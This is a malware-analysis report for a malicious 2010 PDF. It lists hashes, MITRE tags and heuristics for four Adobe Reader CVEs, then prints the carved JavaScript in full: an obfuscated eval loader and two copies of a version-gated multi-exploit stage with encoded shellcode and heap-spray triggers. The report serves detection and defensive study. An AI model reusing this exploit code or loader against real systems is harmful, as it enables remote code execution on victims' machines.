Malicious PDF — malware analysis report

Static analysis result for SHA-256 75de60ef9391d89b…

MALICIOUS

PDF

33.4 KB Created: 2010-07-25 10:32:51
MD5: 02c59152b9919623d4c99fed08f37e1f SHA-1: 94bb35a3ef97b28095d6432517657063166ef6d9 SHA-256: 75de60ef9391d89b69ac5994dea3430b96a695b74aed0bb9024d1a12c4463328
448 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

This PDF file contains embedded JavaScript that exploits multiple known vulnerabilities in Adobe Reader, including CVE-2009-4324, CVE-2009-0927, CVE-2007-5659, and CVE-2008-2992. The JavaScript is designed to trigger these exploits, likely leading to the execution of a second-stage payload. The specific payload and its ultimate purpose could not be determined due to the truncated nature of the extracted scripts.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 10

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0007_000.js
7bc0994a14e9696e2e0332dc907ca887e6cd5a203aa09c3dc71f386fa96c2651		 pdf-javascript-stream PDF /JS object 7 at offset 0x8196 610 bytes
Preview script
First 1,000 lines of the extracted script
rau = (function(){return this;}).call(null);
rev = new Date();
var kqs='';
var gm = 'e'+rev.getFullYear()+'a'+kqs+'l';
irwl=rau[gm.replace('2010','v')];
function agkw(){
	var sti='',zow=[];
	var kqs='';
	irwl('va'+kqs+'r ksp=th'+kqs+'i'+kqs+'s');
	irwl('va'+kqs+'r isd=Str'+kqs+'ing.f'+kqs+'romC'+kqs+'harCode');
	var nlqn='prod' + rev.getFullYear()+'er';
	var ir = ksp[nlqn.replace('2010','uc')];
	var eo = ir.split(',');
	jqgm='le'+kqs+'ng'+kqs+'th';
	var lp = eo[jqgm] / 2;
	for (var fzfk = 0; fzfk < lp; fzfk++) {
		sti += isd(eo[fzfk+lp] - eo[fzfk]);
	}
	
	return sti;
	}
	var meio=agkw();
	irwl(meio);
generic_stage_recovery_000.js
fc6805b4330549051c553e6a677bda41516ef9de67187857b788944c78173bb1		 deobfuscated-js generic stage recovery producer-halfdiff from raw PDF metadata at offset 0x0 3641 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 11 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var vlzm='%u9090%u9090%u16eb%u39b9%u0001%u8b00%u2434%uf789%u3e80%u74e9%uac06%ud334%ue2aa%uc3fa%ue5e8%uffff%u3aff%ud2df%ud3d3%u528d%u8f3f%ud3d2%u5ad3%u5e34%uc39c%ubc5e%ue287%u8408%u8082%u8080%u8080%u8080%u8086%ubb80%ud2d7%ud3d3%u8586%ubb80%ubdbc%ud3d3%ua6bb%ubfa1%u87be%u5dbb%udd9d%u3b3f%ud39b%ud3d3%u3b83%ud3af%ud3d3%u032c%u1750%ubbdb%u3c9c%ud69c%u3b83%ud3bf%ud3d3%u032c%u1356%uc4a6%u87b9%u208a%ubb79%u2da1%uc560%uce3b%ud3d3%u83d3%u823b%ud3d3%u2cd3%u8003%u2db9%u5abb%ud2bc%u3b6e%ud3db%ud3d3%u3b83%ud3ef%ud3d3%u032c%ue2b3%ub713%u8358%u58e3%udf81%u8158%u58c7%ufba1%ucb6a%ud3d3%ue2d3%ue22c%u7f13%ub2ef%ud1af%uf3ff%u1c12%ud2de%u3114%u5223%u882c%u996f%u58b9%uc391%uc158%u0aa6%u975a%ucff7%u10b2%u58b3%uf7bf%u58f7%uef96%u8758%uabd6%u39d2%u9958%u58cb%uf389%u38d2%ue730%u589a%u58e7%u3dd2%u2ce2%u13e2%u7f2f%u1357%ud4a7%u1c12%ud2de%u3814%ue827%uf7af%ua6fb%u5832%uf789%u38d2%u58b5%u98df%u8958%ud2cf%u5838%u58d7%u3bd2%u975a%ucff7%u11b2%ud3db%u3c3b%u2c2d%ubb2c%ua7a7%ue9a3%ufcfc%ub9b2%uabb2%ua7a0%ua7b2%ubdfd%ua7b6%ub7fc%ua3fd%ua3bb%ub5ec%ue2ee%uf5ea%ueeb6%ud3e0';function mf(qamx,bchn){while(qamx.length*2<bchn){qamx+=qamx;}
qamx=qamx.substring(0,bchn/2);return qamx;}
function mylb(){var bee=new Array();var rfuw=0x0c0c0c0c;var addr=0x400000;var payload=unescape(vlzm);var sc_len=payload.length*2;var bchn=addr-(sc_len+0x38);var yarsp=unescape("%u9090%u9090");yarsp=mf(yarsp,bchn);var count2=(rfuw-0x400000)/addr;for(var count=0;count<count2;count++){bee[count]=yarsp+payload;}
var overflow=unescape("%u0c0c%u0c0c");while(overflow.length<44952){overflow+=overflow;}
this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});}
function printf(){nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");var payload=unescape(vlzm);heapblock=nop+payload;bigblock=unescape("%u0A0A%u0A0A");headersize=20;spray=headersize+heapblock.length;while(bigblock.length<spray){bigblock+=bigblock;}
fillblock=bigblock.substring(0,spray);block=bigblock.substring(0,bigblock.length-spray);while(block.length+spray<0x40000){block=block+block+fillblock;}
mem=new Array();for(i=0;i<1400;i++){mem[i]=block+heapblock;}
var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;util.printf("%45000f",num);}
function geticon(){var arry=new Array();if(app.doc.Collab.getIcon){var payload=unescape(vlzm);var hWq500CN=payload.length*2;var bchn=0x400000-(hWq500CN+0x38);var yarsp=unescape("%u9090%u9090");yarsp=mf(yarsp,bchn);var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){arry[vqcQD96y]=yarsp+payload;}
var tUMhNbGw=unescape("%09");while(tUMhNbGw.length<0x4000){tUMhNbGw+=tUMhNbGw;}
tUMhNbGw="N."+tUMhNbGw;app.doc.Collab.getIcon(tUMhNbGw);}}
aPlugins=app.plugIns;var sv=parseInt(app.viewerVersion.toString().charAt(0));for(var i=0;i<aPlugins.length;i++){if(aPlugins[i].name=='EScript'){var lv=aPlugins[i].version;}}
if((lv==9)||((sv==8)&&(lv<=8.12))){geticon();}else if(lv==7.1){printf();}else if(((sv==6)||(sv==7))&&(lv<7.11)){mylb();}else if((lv>=9.1)||(lv<=9.2)||(lv>=8.13)||(lv<=8.17)){function a(){util.printd('p@111111111111111111111111 : yyyy111',new Date());}
var h=app.plugIns;for(var f=0;f<h.length;f++){if(h[f].name=='EScript'){var i=h[f].version;}}
if((i>8.12)&&(i<8.2)){c=new Array();var d=unescape('%u9090%u9090');var e=unescape(vlzm);while(d.length<=0x8000){d+=d;}
d=d.substr(0,0x8000-e.length);for(f=0;f<2900;f++){c[f]=d+e;}
a();a();try{this.media.newPlayer(null);}catch(e){}
a();}}
generic_stage_recovery_001.js
940febd2d48e198ed145ae5952f223730ac51f3ecb8101210aa00dfd9323ffb9		 deobfuscated-js generic stage recovery percent-decode from raw PDF metadata at offset 0x0 3637 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 11 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var vlzm='%u9090%u9090%u16eb%u39b9%u0001%u8b00%u2434%uf789%u3e80%u74e9%uac06%ud334%ue2aa%uc3fa%ue5e8%uffff%u3aff%ud2df%ud3d3%u528d%u8f3f%ud3d2%u5ad3%u5e34%uc39c%ubc5e%ue287%u8408%u8082%u8080%u8080%u8080%u8086%ubb80%ud2d7%ud3d3%u8586%ubb80%ubdbc%ud3d3%ua6bb%ubfa1%u87be%u5dbb%udd9d%u3b3f%ud39b%ud3d3%u3b83%ud3af%ud3d3%u032c%u1750%ubbdb%u3c9c%ud69c%u3b83%ud3bf%ud3d3%u032c%u1356%uc4a6%u87b9%u208a%ubb79%u2da1%uc560%uce3b%ud3d3%u83d3%u823b%ud3d3%u2cd3%u8003%u2db9%u5abb%ud2bc%u3b6e%ud3db%ud3d3%u3b83%ud3ef%ud3d3%u032c%ue2b3%ub713%u8358%u58e3%udf81%u8158%u58c7%ufba1%ucb6a%ud3d3%ue2d3%ue22c%u7f13%ub2ef%ud1af%uf3ff%u1c12%ud2de%u3114%u5223%u882c%u996f%u58b9%uc391%uc158%u0aa6%u975a%ucff7%u10b2%u58b3%uf7bf%u58f7%uef96%u8758%uabd6%u39d2%u9958%u58cb%uf389%u38d2%ue730%u589a%u58e7%u3dd2%u2ce2%u13e2%u7f2f%u1357%ud4a7%u1c12%ud2de%u3814%ue827%uf7af%ua6fb%u5832%uf789%u38d2%u58b5%u98df%u8958%ud2cf%u5838%u58d7%u3bd2%u975a%ucff7%u11b2%ud3db%u3c3b%u2c2d%ubb2c%ua7a7%ue9a3%ufcfc%ub9b2%uabb2%ua7a0%ua7b2%ubdfd%ua7b6%ub7fc%ua3fd%ua3bb%ub5ec%ue2ee%uf5ea%ueeb6%ud3e0';function mf(qamx,bchn){while(qamx.length*2<bchn){qamx+=qamx;}
qamx=qamx.substring(0,bchn/2);return qamx;}
function mylb(){var bee=new Array();var rfuw=0x0c0c0c0c;var addr=0x400000;var payload=unescape(vlzm);var sc_len=payload.length*2;var bchn=addr-(sc_len+0x38);var yarsp=unescape("%u9090%u9090");yarsp=mf(yarsp,bchn);var count2=(rfuw-0x400000)/addr;for(var count=0;count<count2;count++){bee[count]=yarsp+payload;}
var overflow=unescape("%u0c0c%u0c0c");while(overflow.length<44952){overflow+=overflow;}
this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});}
function printf(){nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");var payload=unescape(vlzm);heapblock=nop+payload;bigblock=unescape("%u0A0A%u0A0A");headersize=20;spray=headersize+heapblock.length;while(bigblock.length<spray){bigblock+=bigblock;}
fillblock=bigblock.substring(0,spray);block=bigblock.substring(0,bigblock.length-spray);while(block.length+spray<0x40000){block=block+block+fillblock;}
mem=new Array();for(i=0;i<1400;i++){mem[i]=block+heapblock;}
var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;util.printf("E000f",num);}
function geticon(){var arry=new Array();if(app.doc.Collab.getIcon){var payload=unescape(vlzm);var hWq500CN=payload.length*2;var bchn=0x400000-(hWq500CN+0x38);var yarsp=unescape("%u9090%u9090");yarsp=mf(yarsp,bchn);var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){arry[vqcQD96y]=yarsp+payload;}
var tUMhNbGw=unescape("	");while(tUMhNbGw.length<0x4000){tUMhNbGw+=tUMhNbGw;}
tUMhNbGw="N."+tUMhNbGw;app.doc.Collab.getIcon(tUMhNbGw);}}
aPlugins=app.plugIns;var sv=parseInt(app.viewerVersion.toString().charAt(0));for(var i=0;i<aPlugins.length;i++){if(aPlugins[i].name=='EScript'){var lv=aPlugins[i].version;}}
if((lv==9)||((sv==8)&&(lv<=8.12))){geticon();}else if(lv==7.1){printf();}else if(((sv==6)||(sv==7))&&(lv<7.11)){mylb();}else if((lv>=9.1)||(lv<=9.2)||(lv>=8.13)||(lv<=8.17)){function a(){util.printd('p@111111111111111111111111 : yyyy111',new Date());}
var h=app.plugIns;for(var f=0;f<h.length;f++){if(h[f].name=='EScript'){var i=h[f].version;}}
if((i>8.12)&&(i<8.2)){c=new Array();var d=unescape('%u9090%u9090');var e=unescape(vlzm);while(d.length<=0x8000){d+=d;}
d=d.substr(0,0x8000-e.length);for(f=0;f<2900;f++){c[f]=d+e;}
a();a();try{this.media.newPlayer(null);}catch(e){}
a();}}

Open this report in the interactive analyzer, or submit your own file for analysis.